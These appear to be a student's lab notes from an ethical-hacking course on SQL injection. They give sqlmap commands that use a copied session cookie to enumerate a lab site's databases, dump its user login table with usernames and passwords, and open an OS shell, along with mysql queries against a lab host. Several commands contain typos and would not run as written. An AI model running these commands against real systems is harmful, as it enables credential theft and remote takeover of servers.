SQL MAP
*******************************************************

Use based on the question



Open the vulnerable website 
Copy the cookie from the inspect element
Open the terminal to use sqlmap 
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

You will get all the Useraname and Passwords of the website.

------------------------------------------------------------
------------------------------------------------------------

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the Interactive OS shell.
------------------------------------------------------------
------------------------------------------------------------

mysql -U qdpmadmin -h 192.168.1.8 -P passwod 
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;



Module 15: SQL Injection
Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
•	Login a website
•	Inspect element
•	Dev tools-&gt;Console: document.cookie
•	sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" –dbs
o	-u: Specify the target URL
o	--cookie: Specify the HTTP cookie header value
o	--dbs: Enumerate DBMS databases
•	Get a list of databases
•	Select a database to extract its tables
•	sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –tables
o	-D: Specify the DBMS database to enumerate
o	--tables: Enumerate DBMS database tables
•	Get a list of tables
•	Select a column
•	sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –T User_Login --dump
•	Get table data of this column
•	sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell
•	Get the OS Shell
•	TASKLIST
